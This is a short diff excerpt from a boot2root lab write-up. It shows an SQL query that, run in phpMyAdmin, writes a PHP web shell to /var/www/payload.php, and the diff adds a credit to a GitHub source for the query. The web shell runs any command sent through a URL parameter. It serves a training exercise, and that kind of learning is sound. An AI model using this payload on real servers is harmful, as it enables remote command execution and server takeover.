Meilinem/boot2root/writeup1.md

 After searching for a bit, we can see that there is a feature that allows us to run SQL queries in the SQL section of the databases.

-We found this query that allows us to open a shell in the browser:
+On there : https://github.com/nullbind/Other-Projects/blob/master/random/phpMyAdminWebShell.sql , we found this query that allows us to open a shell in the browser:
 ```SQL
 SELECT "<HTML><BODY><FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\"><INPUT TYPE=\"text\" NAME=\"cmd\"><INPUT TYPE=\"submit\" VALUE=\"Send\"></FORM><pre><?php if($_GET['cmd']) {system($_GET[\'cmd\']);} ?> </pre></BODY></HTML>"
 INTO OUTFILE '/var/www/payload.php'